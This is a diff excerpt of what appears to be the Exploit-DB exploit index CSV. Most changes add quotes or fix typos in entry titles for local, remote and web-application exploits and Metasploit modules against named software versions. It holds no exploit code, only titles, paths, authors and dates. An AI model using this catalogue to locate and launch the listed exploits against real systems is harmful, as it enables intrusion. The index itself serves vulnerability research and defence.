22617,exploits/linux/local/22617.c,"Maelstrom Player 3.0.x - Argument Buffer Overflow (2)",2003-05-20,knight420,local,linux,
|
||||
22628,exploits/multiple/local/22628.sh,"Platform Load Sharing Facility 4/5 - LSF_ENVDIR Local Command Execution",2003-03-20,"Tomasz Grabowski",local,multiple,
|
||||
22628,exploits/multiple/local/22628.sh,"Platform Load Sharing Facility 4/5 - 'LSF_ENVDIR' Local Command Execution",2003-03-20,"Tomasz Grabowski",local,multiple,
|
||||
22633,exploits/linux/local/22633.c,"Polymorph 0.4 - Filename Buffer Overflow",2003-05-22,demz,local,linux,
|
||||
22640,exploits/linux/local/22640.c,"UML_NET - Integer Mismanagement Code Execution",2003-05-23,ktha@hushmail.com,local,linux,
|
||||
22643,exploits/linux/local/22643.pl,"Ifenslave 0.0.7 - Argument Local Buffer Overflow (1)",2003-05-26,jlanthea,local,linux,
|
||||
|
@ -11384,7 +11384,7 @@ id,file,description,date,author,type,platform,port
|
|||
14875,exploits/multiple/remote/14875.txt,"Accton-based switches (3com / Dell / SMC / Foundry / EdgeCore) - Backdoor Password",2010-09-02,"Edwin Eefting",remote,multiple,
|
||||
14886,exploits/windows/remote/14886.py,"Microsoft Movie Maker - Remote Code Execution (MS10-016)",2010-09-04,Abysssec,remote,windows,
|
||||
14878,exploits/windows/remote/14878.html,"Trend Micro Internet Security Pro 2010 - ActiveX 'extSetOwner()' Remote Code Execution (2)",2010-09-03,Abysssec,remote,windows,
|
||||
14885,exploits/windows/remote/14885.html,"Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote Command Exeuction",2010-11-17,Dr_IDE,remote,windows,
|
||||
14885,exploits/windows/remote/14885.html,"Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote Command Execution",2010-11-17,Dr_IDE,remote,windows,
|
||||
14895,exploits/windows/remote/14895.py,"Microsoft MPEG Layer-3 - Remote Command Execution",2010-09-05,Abysssec,remote,windows,
|
||||
14925,exploits/linux/remote/14925.txt,"weborf 0.12.2 - Directory Traversal",2010-09-07,Rew,remote,linux,
|
||||
14941,exploits/windows_x86/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow",2010-09-07,"Lincoln_ Nullthreat_ rick2600",remote,windows_x86,80
|
||||
|
@ -11469,7 +11469,7 @@ id,file,description,date,author,type,platform,port
|
|||
15963,exploits/windows/remote/15963.rb,"Microsoft Windows - Common Control Library 'Comctl32' Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",remote,windows,
|
||||
15984,exploits/windows/remote/15984.html,"Microsoft Data Access Components - Remote Overflow (MS11-002)",2011-01-12,"Peter Vreugdenhil",remote,windows,
|
||||
16014,exploits/windows/remote/16014.html,"Novell iPrint 5.52 - ActiveX 'GetDriverSettings()' Command Execution",2011-01-19,Dr_IDE,remote,windows,
|
||||
16036,exploits/windows/remote/16036.rb,"Golden FTP Server 4.70 - PASS Command Buffer Overflow",2011-01-23,"cd1zz & iglesiasgg",remote,windows,
|
||||
16036,exploits/windows/remote/16036.rb,"Golden FTP Server 4.70 - 'PASS' Buffer Overflow",2011-01-23,"cd1zz & iglesiasgg",remote,windows,
|
||||
16041,exploits/multiple/remote/16041.txt,"Sun Microsystems SunScreen Firewall - Privilege Escalation",2011-01-25,kingcope,remote,multiple,
|
||||
16052,exploits/windows/remote/16052.txt,"Oracle Document Capture 10.1.3.5 - Insecure Method / Buffer Overflow",2011-01-26,"Alexandr Polyakov",remote,windows,
|
||||
16053,exploits/windows/remote/16053.txt,"Oracle Document Capture - Actbar2.ocx Insecure Method",2011-01-26,"Evdokimov Dmitriy",remote,windows,
|
||||
|
@ -11845,7 +11845,7 @@ id,file,description,date,author,type,platform,port
|
|||
16708,exploits/windows/remote/16708.rb,"LeapWare LeapFTP 2.7.3.600 - PASV Reply Client Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,
|
||||
16709,exploits/windows/remote/16709.rb,"ProFTP 2.9 - Banner Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,remote,windows,
|
||||
16710,exploits/windows/remote/16710.rb,"Trellian FTP Client 3.01 - PASV Remote Buffer Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows,
|
||||
16711,exploits/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,remote,windows,
|
||||
16711,exploits/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 - 'MKD' Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,remote,windows,
|
||||
16712,exploits/windows/remote/16712.rb,"BolinTech DreamFTP Server 1.02 - Format String (Metasploit)",2010-06-22,Metasploit,remote,windows,21
|
||||
16713,exploits/windows/remote/16713.rb,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (2)",2011-02-23,Metasploit,remote,windows,
|
||||
16714,exploits/windows_x86/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,remote,windows_x86,2100
|
||||
|
@ -11857,7 +11857,7 @@ id,file,description,date,author,type,platform,port
|
|||
16720,exploits/windows/remote/16720.rb,"FTP Synchronizer Professional 4.0.73.274 - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows,
|
||||
16721,exploits/windows/remote/16721.rb,"FileWrangler 5.30 - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows,
|
||||
16722,exploits/windows/remote/16722.rb,"Xlink FTP Client - Remote Buffer Overflow (Metasploit)",2010-11-11,Metasploit,remote,windows,
|
||||
16723,exploits/windows/remote/16723.rb,"Vermillion FTP Daemon - PORT Command Memory Corruption (Metasploit)",2010-09-20,Metasploit,remote,windows,
|
||||
16723,exploits/windows/remote/16723.rb,"Vermillion FTP Daemon - 'PORT' Memory Corruption (Metasploit)",2010-09-20,Metasploit,remote,windows,
|
||||
16724,exploits/windows/remote/16724.rb,"War-FTPD 1.65 - 'Username' Remote Overflow (Metasploit)",2010-07-03,Metasploit,remote,windows,
|
||||
16725,exploits/windows/remote/16725.rb,"FTPGetter Standard 3.55.0.05 - Remote Stack Buffer Overflow (PWD) (Metasploit)",2010-11-14,Metasploit,remote,windows,
|
||||
16726,exploits/windows/remote/16726.rb,"FTPPad 1.2.0 - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows,
|
||||
|
@ -11868,10 +11868,10 @@ id,file,description,date,author,type,platform,port
|
|||
16731,exploits/windows_x86/remote/16731.rb,"Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows_x86,
|
||||
16732,exploits/windows/remote/16732.rb,"httpdx - 'tolog()' Format String (Metasploit) (1)",2010-08-25,Metasploit,remote,windows,
|
||||
16733,exploits/windows/remote/16733.rb,"FileCOPA FTP Server (Pre 18 Jul Version) - 'LIST' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,21
|
||||
16734,exploits/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow (Metasploit)",2010-08-03,Metasploit,remote,windows,
|
||||
16734,exploits/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - 'LIST' Stack Buffer Overflow (Metasploit)",2010-08-03,Metasploit,remote,windows,
|
||||
16735,exploits/windows/remote/16735.rb,"NetTerm NetFTPD - 'USER' Remote Buffer Overflow (Metasploit)",2010-10-05,Metasploit,remote,windows,
|
||||
16736,exploits/windows/remote/16736.rb,"FTPShell 5.1 - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows,
|
||||
16737,exploits/windows/remote/16737.rb,"EasyFTP Server 1.7.0.11 - CWD Command Stack Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,
|
||||
16737,exploits/windows/remote/16737.rb,"EasyFTP Server 1.7.0.11 - 'CWD' Stack Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,
|
||||
16738,exploits/windows_x86/remote/16738.rb,"AASync 2.2.1.0 (Windows x86) - Remote Stack Buffer Overflow 'LIST' (Metasploit)",2010-11-14,Metasploit,remote,windows_x86,
|
||||
16739,exploits/windows/remote/16739.rb,"Xftp FTP Client 3.0 - PWD Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,21
|
||||
16740,exploits/windows/remote/16740.rb,"Microsoft IIS FTP Server - NLST Response Overflow (MS09-053) (Metasploit)",2010-11-12,Metasploit,remote,windows,21
|
||||
|
@ -12008,13 +12008,13 @@ id,file,description,date,author,type,platform,port
|
|||
16876,exploits/osx_ppc/remote/16876.rb,"Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)",2010-06-21,Metasploit,remote,osx_ppc,
|
||||
16878,exploits/linux/remote/16878.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,remote,linux,
|
||||
16880,exploits/bsd_x86/remote/16880.rb,"Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit)",2010-06-17,Metasploit,remote,bsd_x86,
|
||||
16887,exploits/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,remote,linux,
|
||||
16887,exploits/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - 'connectedNodes.ovp'l Remote Command Execution (Metasploit)",2010-07-03,Metasploit,remote,linux,
|
||||
16888,exploits/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,remote,linux,
|
||||
16903,exploits/php/remote/16903.rb,"OpenX - 'banner-edit.php' Arbitrary File Upload / PHP Code Execution (Metasploit)",2010-09-20,Metasploit,remote,php,
|
||||
16910,exploits/linux/remote/16910.rb,"Mitel Audio and Web Conferencing - Command Injection (Metasploit)",2011-01-08,Metasploit,remote,linux,
|
||||
16915,exploits/linux/remote/16915.rb,"Oracle VM Server Virtual Server Agent - Command Injection (Metasploit)",2010-10-25,Metasploit,remote,linux,
|
||||
16916,exploits/linux/remote/16916.rb,"Citrix Access Gateway - Command Execution (Metasploit)",2011-03-03,Metasploit,remote,linux,
|
||||
16918,exploits/freebsd/remote/16918.rb,"Zabbix Agent - net.tcp.listen Command Injection (Metasploit)",2010-07-03,Metasploit,remote,freebsd,
|
||||
16918,exploits/freebsd/remote/16918.rb,"Zabbix Agent - 'net.tcp.listen' Command Injection (Metasploit)",2010-07-03,Metasploit,remote,freebsd,
|
||||
16920,exploits/linux/remote/16920.rb,"SpamAssassin spamd - Remote Command Execution (Metasploit)",2010-04-30,Metasploit,remote,linux,
|
||||
16921,exploits/linux/remote/16921.rb,"ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)",2010-12-03,Metasploit,remote,linux,
|
||||
16922,exploits/linux/remote/16922.rb,"UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)",2010-12-05,Metasploit,remote,linux,
|
||||
|
@ -12138,7 +12138,7 @@ id,file,description,date,author,type,platform,port
|
|||
17575,exploits/windows/remote/17575.txt,"Apple Safari 5.0.5 - SVG Remote Code Execution (DEP Bypass)",2011-07-26,Abysssec,remote,windows,
|
||||
17578,exploits/windows/remote/17578.txt,"MinaliC WebServer 2.0 - Remote Source Disclosure",2011-07-27,X-h4ck,remote,windows,
|
||||
17581,exploits/windows/remote/17581.txt,"MyWebServer 1.0.3 - Arbitrary File Download",2011-07-28,X-h4ck,remote,windows,
|
||||
17588,exploits/windows/remote/17588.rb,"Actfax FTP Server 4.27 - USER Command Stack Buffer Overflow (Metasploit)",2011-07-31,mr_me,remote,windows,
|
||||
17588,exploits/windows/remote/17588.rb,"Actfax FTP Server 4.27 - 'USER' Stack Buffer Overflow (Metasploit)",2011-07-31,mr_me,remote,windows,
|
||||
17612,exploits/windows/remote/17612.rb,"Mozilla Firefox 3.6.16 - OBJECT mChannel Remote Code Execution (DEP Bypass) (Metasploit)",2011-08-05,Rh0,remote,windows,
|
||||
17614,exploits/hp-ux/remote/17614.sh,"HP Data Protector (HP-UX) - Remote Shell",2011-08-05,"Adrian Puente Z.",remote,hp-ux,
|
||||
17619,exploits/windows/remote/17619.py,"CiscoKits 1.0 - TFTP Server Directory Traversal",2011-08-05,"SecPod Research",remote,windows,
|
||||
|
@ -12740,8 +12740,8 @@ id,file,description,date,author,type,platform,port
|
|||
20248,exploits/windows/remote/20248.txt,"SmartWin CyberOffice Shopping Cart 2.0 - Client Information Disclosure",2000-10-02,DCIST,remote,windows,
|
||||
20249,exploits/windows/remote/20249.txt,"David Harris Pegasus Mail 3.12 - File Forwarding",2000-10-03,"Imran Ghory",remote,windows,
|
||||
20253,exploits/linux/remote/20253.sh,"OpenSSH 1.2 - '.scp' File Create/Overwrite",2000-09-30,"Michal Zalewski",remote,linux,
|
||||
20258,exploits/multiple/remote/20258.c,"HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - rpc.ypupdated Command Execution (1)",1994-02-07,"Josh D",remote,multiple,
|
||||
20259,exploits/multiple/remote/20259.txt,"HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - rpc.ypupdated Command Execution (2)",1994-02-07,anonymous,remote,multiple,
|
||||
20258,exploits/multiple/remote/20258.c,"HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - 'rpc.ypupdated' Command Execution (1)",1994-02-07,"Josh D",remote,multiple,
|
||||
20259,exploits/multiple/remote/20259.txt,"HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - 'rpc.ypupdated' Command Execution (2)",1994-02-07,anonymous,remote,multiple,
|
||||
20500,exploits/php/remote/20500.rb,"TestLink 1.9.3 - Arbitrary File Upload (Metasploit)",2012-08-15,Metasploit,remote,php,
|
||||
20266,exploits/windows/remote/20266.txt,"Microsoft Virtual Machine 2000/3100/3200/3300 Series - 'com.ms.activeX.ActiveXComponent' Arbitrary Program Execution",2000-10-05,"Marcin Jackowski",remote,windows,
|
||||
20298,exploits/windows/remote/20298.c,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (1)",2000-10-17,"Gabriel Maggiotti",remote,windows,
|
||||
|
@ -12888,7 +12888,7 @@ id,file,description,date,author,type,platform,port
|
|||
20593,exploits/freebsd/remote/20593.txt,"FreeBSD 3.x/4.x - 'ipfw' Filtering Evasion",2001-01-23,"Aragon Gouveia",remote,freebsd,
|
||||
20594,exploits/unix/remote/20594.txt,"WU-FTPD 2.4.2/2.5/2.6 - Debug Mode Client Hostname Format String",2001-01-23,"Wu-ftpd team",remote,unix,
|
||||
20595,exploits/multiple/remote/20595.txt,"NCSA 1.3/1.4.x/1.5 / Apache HTTPd 0.8.11/0.8.14 - ScriptAlias Source Retrieval",1999-09-25,anonymous,remote,multiple,
|
||||
20597,exploits/linux/remote/20597.txt,"Majordomo 1.89/1.90 - lists Command Execution",1994-06-06,"Razvan Dragomirescu",remote,linux,
|
||||
20597,exploits/linux/remote/20597.txt,"Majordomo 1.89/1.90 - 'lists' Command Execution",1994-06-06,"Razvan Dragomirescu",remote,linux,
|
||||
20599,exploits/unix/remote/20599.sh,"Sendmail 8.6.9 IDENT - Remote Command Execution",1994-02-24,CIAC,remote,unix,
|
||||
20600,exploits/windows/remote/20600.c,"SmartMax MailMax 1.0 - SMTP Buffer Overflow",1999-02-13,_mcp_,remote,windows,
|
||||
20601,exploits/multiple/remote/20601.txt,"iweb hyperseek 2000 - Directory Traversal",2001-01-28,"MC GaN",remote,multiple,
|
||||
|
@ -12914,7 +12914,7 @@ id,file,description,date,author,type,platform,port
|
|||
20629,exploits/cgi/remote/20629.txt,"Way-Board 2.0 - File Disclosure",2001-02-12,cuctema,remote,cgi,
|
||||
20630,exploits/cgi/remote/20630.txt,"Martin Hamilton ROADS 2.3 - File Disclosure",2001-02-12,cuctema,remote,cgi,
|
||||
20631,exploits/cgi/remote/20631.txt,"PALS Library System WebPALS 1.0 - pals-cgi Traversal Arbitrary File Read",2001-02-02,cuctema,remote,cgi,
|
||||
20632,exploits/cgi/remote/20632.txt,"PALS Library System WebPALS 1.0 - pals-cgi Arbitrary Command Execution",2001-02-02,cuctema,remote,cgi,
|
||||
20632,exploits/cgi/remote/20632.txt,"PALS Library System WebPALS 1.0 - 'pals-cgi' Arbitrary Command Execution",2001-02-02,cuctema,remote,cgi,
|
||||
20633,exploits/cgi/remote/20633.txt,"Brightstation Muscat 1.0 - Full Path Disclosure",2001-02-12,cuctema,remote,cgi,
|
||||
20635,exploits/multiple/remote/20635.txt,"caucho Technology resin 1.2 - Directory Traversal",2001-02-16,joetesta,remote,multiple,
|
||||
20636,exploits/linux/remote/20636.txt,"thinking arts es.one 1.0 - Directory Traversal",2001-02-16,slipy,remote,linux,
|
||||
|
@ -13266,7 +13266,7 @@ id,file,description,date,author,type,platform,port
|
|||
21555,exploits/windows/remote/21555.txt,"Cisco Secure ACS for Windows NT 3.0 - Cross-Site Scripting",2002-06-14,"Dave Palumbo",remote,windows,
|
||||
21559,exploits/multiple/remote/21559.c,"Apache 1.x/2.0.x - Chunked-Encoding Memory Corruption (1)",2002-06-17,"Gobbles Security",remote,multiple,
|
||||
21560,exploits/multiple/remote/21560.c,"Apache 1.x/2.0.x - Chunked-Encoding Memory Corruption (2)",2002-06-17,"Gobbles Security",remote,multiple,
|
||||
21571,exploits/irix/remote/21571.c,"SGI IRIX 6.x - rpc.xfsmd Remote Command Execution",2002-06-20,"Last Stage of Delirium",remote,irix,
|
||||
21571,exploits/irix/remote/21571.c,"SGI IRIX 6.x - 'rpc.xfsmd' Remote Command Execution",2002-06-20,"Last Stage of Delirium",remote,irix,
|
||||
21574,exploits/unix/remote/21574.txt,"Pirch IRC 98 Client - Malformed Link Buffer Overrun",2002-06-21,"David Rude II",remote,unix,
|
||||
21576,exploits/windows/remote/21576.txt,"Working Resources BadBlue 1.7 - 'ext.dll' Cross-Site Scripting",2002-06-23,"Matthew Murphy",remote,windows,
|
||||
21578,exploits/unix/remote/21578.txt,"OpenSSH 3.x - Challenge-Response Buffer Overflow (1)",2002-06-24,"Christophe Devine",remote,unix,
|
||||
|
@ -13628,7 +13628,7 @@ id,file,description,date,author,type,platform,port
|
|||
22723,exploits/windows/remote/22723.txt,"MegaBrowser 0.3 - HTTP Directory Traversal",2003-06-04,JeiAr,remote,windows,
|
||||
22726,exploits/windows/remote/22726.txt,"Microsoft Internet Explorer 5 - OBJECT Tag Buffer Overflow",2003-06-04,FelineMenace,remote,windows,
|
||||
22728,exploits/windows/remote/22728.txt,"Microsoft Internet Explorer 5 - Classic Mode FTP Client Cross Domain Scripting",2003-06-04,"Matthew Murphy",remote,windows,
|
||||
22733,exploits/hp-ux/remote/22733.c,"HP-UX FTPD 1.1.214.4 - REST Command Memory Disclosure",2003-06-05,di0aD,remote,hp-ux,
|
||||
22733,exploits/hp-ux/remote/22733.c,"HP-UX FTPD 1.1.214.4 - 'REST' Memory Disclosure",2003-06-05,di0aD,remote,hp-ux,
|
||||
22734,exploits/windows/remote/22734.html,"Microsoft Internet Explorer 6 - '%USERPROFILE%' File Execution",2003-06-05,"Eiji James Yoshida",remote,windows,
|
||||
22737,exploits/windows/remote/22737.txt,"Novell NetIQ Privileged User Manager 2.3.1 - 'auth.dll' pa_modify_accounts() Remote Code Execution",2012-11-15,rgod,remote,windows,
|
||||
22738,exploits/windows/remote/22738.txt,"Novell NetIQ Privileged User Manager 2.3.1 - 'ldapagnt.dll' ldapagnt_eval() Perl Code Evaluation Remote Code Execution",2012-11-15,rgod,remote,windows,
|
||||
|
@ -14101,7 +14101,7 @@ id,file,description,date,author,type,platform,port
|
|||
24547,exploits/php/remote/24547.rb,"Kordil EDms 2.2.60rc3 - Arbitrary File Upload (Metasploit)",2013-02-26,Metasploit,remote,php,
|
||||
24548,exploits/php/remote/24548.rb,"Glossword 1.8.8 < 1.8.12 - Arbitrary File Upload (Metasploit)",2013-02-26,Metasploit,remote,php,
|
||||
24549,exploits/php/remote/24549.rb,"PolarPearCMS - Arbitrary '.PHP' File Upload (Metasploit)",2013-02-26,Metasploit,remote,php,
|
||||
24557,exploits/windows/remote/24557.py,"Sami FTP Server 2.0.1 - LIST Command Buffer Overflow",2013-03-01,superkojiman,remote,windows,
|
||||
24557,exploits/windows/remote/24557.py,"Sami FTP Server 2.0.1 - 'LIST' Buffer Overflow",2013-03-01,superkojiman,remote,windows,
|
||||
24567,exploits/multiple/remote/24567.txt,"Oracle Database Server 8.1.7/9.0.x - ctxsys.driload Access Validation",2004-09-03,"Alexander Kornbrust",remote,multiple,
|
||||
24568,exploits/windows/remote/24568.html,"Grokster 1.3/2.6 / KaZaA Media Desktop 1.3.x/1.6.1/2.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,remote,windows,
|
||||
24571,exploits/windows/remote/24571.html,"NullSoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,remote,windows,
|
||||
|
@ -14159,7 +14159,7 @@ id,file,description,date,author,type,platform,port
|
|||
24856,exploits/linux/remote/24856.c,"NapShare 1.2 - Remote Buffer Overflow (1)",2004-12-06,"Bartlomiej Sieka",remote,linux,
|
||||
24857,exploits/linux/remote/24857.c,"NapShare 1.2 - Remote Buffer Overflow (2)",2004-12-10,"Bartlomiej Sieka",remote,linux,
|
||||
24874,exploits/multiple/remote/24874.rb,"Apache Struts - 'ParametersInterceptor' Remote Code Execution (Metasploit)",2013-03-22,Metasploit,remote,multiple,
|
||||
24875,exploits/windows/remote/24875.rb,"Sami FTP Server - LIST Command Buffer Overflow (Metasploit)",2013-03-22,Metasploit,remote,windows,
|
||||
24875,exploits/windows/remote/24875.rb,"Sami FTP Server - 'LIST' Buffer Overflow (Metasploit)",2013-03-22,Metasploit,remote,windows,
|
||||
24876,exploits/windows/remote/24876.rb,"Cool PDF Image Stream - Remote Buffer Overflow (Metasploit)",2013-03-22,Metasploit,remote,windows,
|
||||
24886,exploits/windows/remote/24886.html,"Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' 'WzTitle' Remote Heap Spray",2013-03-25,Dr_IDE,remote,windows,
|
||||
24887,exploits/windows/remote/24887.rb,"KingView - Log File Parsing Buffer Overflow (Metasploit)",2013-03-25,Metasploit,remote,windows,
|
||||
|
@ -14466,7 +14466,7 @@ id,file,description,date,author,type,platform,port
|
|||
27528,exploits/hardware/remote/27528.rb,"D-Link Devices - 'command.php' Remote Command Execution (Metasploit)",2013-08-12,Metasploit,remote,hardware,
|
||||
27293,exploits/php/remote/27293.rb,"PineApp Mail-SeCure - 'test_li_connection.php' Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,remote,php,7443
|
||||
27294,exploits/php/remote/27294.rb,"PineApp Mail-SeCure - 'ldapsyncnow.php' Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,remote,php,7443
|
||||
27295,exploits/unix/remote/27295.rb,"PineApp Mail-SeCure - livelog.html Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,remote,unix,7443
|
||||
27295,exploits/unix/remote/27295.rb,"PineApp Mail-SeCure - 'livelog.html' Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,remote,unix,7443
|
||||
27319,exploits/hardware/remote/27319.txt,"Thomson SpeedTouch 500 Series - NewUser Function 31 Variable Persistent User Creation",2006-02-25,"Preben Nylokken",remote,hardware,
|
||||
27325,exploits/windows/remote/27325.txt,"DirectContact 0.3.b - Directory Traversal",2006-02-27,"Donato Ferrante",remote,windows,
|
||||
27326,exploits/linux/remote/27326.txt,"MySQL 5.0.18 - Query Logging Bypass",2006-02-27,1dt.w0lf,remote,linux,
|
||||
|
@ -14847,7 +14847,7 @@ id,file,description,date,author,type,platform,port
|
|||
30589,exploits/windows/remote/30589.txt,"WinImage 8.0/8.10 - File Handling Traversal Arbitrary File Overwrite",2007-09-17,j00ru//vx,remote,windows,
|
||||
30600,exploits/windows/remote/30600.html,"Xunlei Web Thunder 5.6.9.344 - ActiveX Control DownURL2 Method Remote Buffer Overflow",2007-09-20,7jdg,remote,windows,
|
||||
30622,exploits/windows/remote/30622.html,"Microsoft Internet Explorer 5.0.1 - Arbitrary File Upload",2007-09-27,"Ronald van den Heetkamp",remote,windows,
|
||||
30627,exploits/windows/remote/30627.pl,"FSD 2.052/3.000 - sysuser.cc sysuser::exechelp Function HELP Command Remote Overflow",2007-10-01,"Luigi Auriemma",remote,windows,
|
||||
30627,exploits/windows/remote/30627.pl,"FSD 2.052/3.000 - 'sysuser.cc sysuser::exechelp' 'HELP' Remote Overflow",2007-10-01,"Luigi Auriemma",remote,windows,
|
||||
30630,exploits/multiple/remote/30630.c,"id Software Doom 3 Engine - Console String Visualization Format String",2007-10-02,"Luigi Auriemma",remote,multiple,
|
||||
30631,exploits/multiple/remote/30631.txt,"Google Mini Search Appliance 3.4.14 - 'IE' Cross-Site Scripting",2007-09-20,Websecurity,remote,multiple,
|
||||
30635,exploits/windows/remote/30635.pl,"Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (1)",2007-11-13,"Alla Berzroutchko",remote,windows,
|
||||
|
@ -14982,7 +14982,7 @@ id,file,description,date,author,type,platform,port
|
|||
31638,exploits/windows/remote/31638.txt,"HP OpenView Network Node Manager (OV NNM) 7.x - 'OpenView5.exe?Action' Traversal Arbitrary File Access",2008-04-11,"Luigi Auriemma",remote,windows,
|
||||
31639,exploits/php/remote/31639.txt,"Trillian 3.1.9 - '.DTD' File XML Parser Buffer Overflow",2008-04-11,david130490,remote,php,
|
||||
31917,exploits/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution (Metasploit)",2014-02-26,Metasploit,remote,windows,9090
|
||||
31689,exploits/windows/remote/31689.py,"HP Data Protector - EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",remote,windows,5555
|
||||
31689,exploits/windows/remote/31689.py,"HP Data Protector - 'EXEC_BAR' Remote Command Execution",2014-02-16,"Chris Graham",remote,windows,5555
|
||||
31694,exploits/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad Alharmeel",remote,windows,
|
||||
31695,exploits/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection (Metasploit)",2014-02-16,Metasploit,remote,php,
|
||||
31706,exploits/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 - URI Handler Command Execution",2008-04-24,"Thomas Pollet",remote,unix,
|
||||
|
@ -15742,7 +15742,7 @@ id,file,description,date,author,type,platform,port
|
|||
36507,exploits/windows/remote/36507.txt,"Microsoft AntiXSS 3/4.0 Library Sanitization Module - Security Bypass",2012-01-10,"Adi Cohen",remote,windows,
|
||||
36511,exploits/hardware/remote/36511.txt,"Astaro Security Gateway 8.1 - HTML Injection",2012-12-27,"Vulnerability Research Laboratory",remote,hardware,
|
||||
36513,exploits/windows/remote/36513.txt,"IpTools 0.1.4 - Tiny TCP/IP servers Directory Traversal",2012-01-06,demonalex,remote,windows,
|
||||
36514,exploits/windows/remote/36514.pl,"IPtools 0.1.4 - Remote Command Server Buffer Overflow",2012-01-06,demonalex,remote,windows,
|
||||
36514,exploits/windows/remote/36514.pl,"IPtools 0.1.4 - Remote Buffer Overflow",2012-01-06,demonalex,remote,windows,
|
||||
36516,exploits/windows/remote/36516.py,"Acunetix 9.5 - OLE Automation Array Remote Code Execution",2015-03-27,"Naser Farhadi",remote,windows,
|
||||
36517,exploits/windows/remote/36517.html,"WebGate WinRDS 2.0.8 - StopSiteAllChannel Stack Overflow",2015-03-27,"Praveen Darshanam",remote,windows,
|
||||
36518,exploits/windows/remote/36518.html,"WebGate Control Center 4.8.7 - GetThumbnail Stack Overflow",2015-03-27,"Praveen Darshanam",remote,windows,
|
||||
|
@ -16616,7 +16616,7 @@ id,file,description,date,author,type,platform,port
|
|||
630,exploits/php/webapps/630.pl,"UBBCentral UBB.Threads 6.2.x < 6.3x - One Char Brute Force",2004-11-15,RusH,webapps,php,
|
||||
631,exploits/php/webapps/631.txt,"vBulletin - 'LAST.php' SQL Injection",2004-11-15,anonymous,webapps,php,
|
||||
635,exploits/php/webapps/635.txt,"MiniBB 1.7f - 'user' SQL Injection",2004-11-16,anonymous,webapps,php,
|
||||
642,exploits/cgi/webapps/642.pl,"TWiki 20030201 - search.pm Remote Command Execution",2004-11-20,RoMaNSoFt,webapps,cgi,
|
||||
642,exploits/cgi/webapps/642.pl,"TWiki 20030201 - 'search.pm' Remote Command Execution",2004-11-20,RoMaNSoFt,webapps,cgi,
|
||||
645,exploits/php/webapps/645.pl,"GFHost PHP GMail - Remote Command Execution",2004-11-21,spabam,webapps,php,
|
||||
647,exploits/php/webapps/647.pl,"phpBB 2.0.10 - Remote Command Execution",2004-11-22,RusH,webapps,php,
|
||||
648,exploits/php/webapps/648.pl,"Invision Power Board 2.0.0 < 2.0.2 - SQL Injection",2004-11-22,RusH,webapps,php,
|
||||
|
@ -16632,8 +16632,8 @@ id,file,description,date,author,type,platform,port
|
|||
737,exploits/php/webapps/737.txt,"QwikiWiki - Directory Traversal",2005-01-04,Madelman,webapps,php,
|
||||
740,exploits/php/webapps/740.pl,"phpBB 2.0.10 - 'ssh.D.Worm' Bot Install Altavista",2005-01-04,"Severino Honorato",webapps,php,
|
||||
